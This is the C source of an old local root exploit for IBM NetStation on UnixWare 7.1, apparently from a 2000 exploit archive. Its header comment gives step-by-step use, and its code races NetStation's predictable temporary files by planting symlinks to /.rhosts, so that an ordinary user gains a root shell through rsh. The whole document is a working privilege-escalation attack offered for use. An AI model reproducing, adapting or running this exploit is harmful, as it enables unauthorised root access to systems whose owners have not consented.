/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
 *
 * Exploits a temporary file race condition in NetStation's HTTP interface
 *
 * To exploit: first, change the paths below to reflect your individual
 * settings/paths.  Don't worry if <username>.nsu doesn't exist, NS will
 * create it for you.  Next, point your browser at
 * http://localhost:880 and login as a normal user.  Click on "Hardware"
 * Then "workstation".  This will create <netstationdir>/users/xnec.
 * Next, compile and run this program.  You only have thirty seconds from
 * the time you complete this step to then click on "Workstation".  When
 * this is done, you should have an /.rhosts which you own.  On some
 * UnixWare systems, you may need to chown root /.rhosts in order to do
 * rsh -l root localhost sh -i.
 *
 * Brock Tellier btellier@usa.net
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>

void main()
{
  /* Change these paths */

  char dest[20] = "/.rhosts";
  char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
  char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
  long sec;
  int i;

  sec = time(0);

  for (i = 0; i < 30; i++)
    {
      sprintf(sourcesym, "%s%d", source, (sec + i));
      symlink(dest,sourcesym);
    }
}
/*                    www.hack.co.za              [2000]*/